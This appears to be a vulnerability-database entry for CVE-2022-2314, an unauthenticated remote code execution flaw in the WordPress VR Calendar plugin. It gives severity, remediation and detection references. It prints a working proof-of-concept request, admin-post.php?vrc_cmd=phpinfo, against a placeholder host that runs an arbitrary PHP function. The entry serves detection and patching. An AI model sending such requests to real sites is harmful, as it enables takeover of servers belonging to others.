🔙 목록으로 돌아가기

CVE-2022-2314: WordPress VR Calendar <=2.3.2 - Remote Code Execution

TitleWordPress VR Calendar <=2.3.2 - Remote Code Execution
Authortheamanrawat
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site.
RemediationUpdate the WordPress VR Calendar plugin to version 2.3.3 or later to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.88733
CVE IDCVE-2022-2314
CWE IDCWE-78,NVD-CWE-noinfo
Tags cve cve2022 wordpress wp wp-plugin rce vr-calendar-sync unauth wpscan vr_calendar_project vkev vuln

🔍 Vulnerability Description

WordPress VR Calendar plugin through 2.3.2 is susceptible to remote code execution. The plugin allows any user to execute arbitrary PHP functions on the site. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.

🌐 HTTP Request

GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Connection: close
Accept-Encoding: gzip
GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Version/8.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-2314.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-2314.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A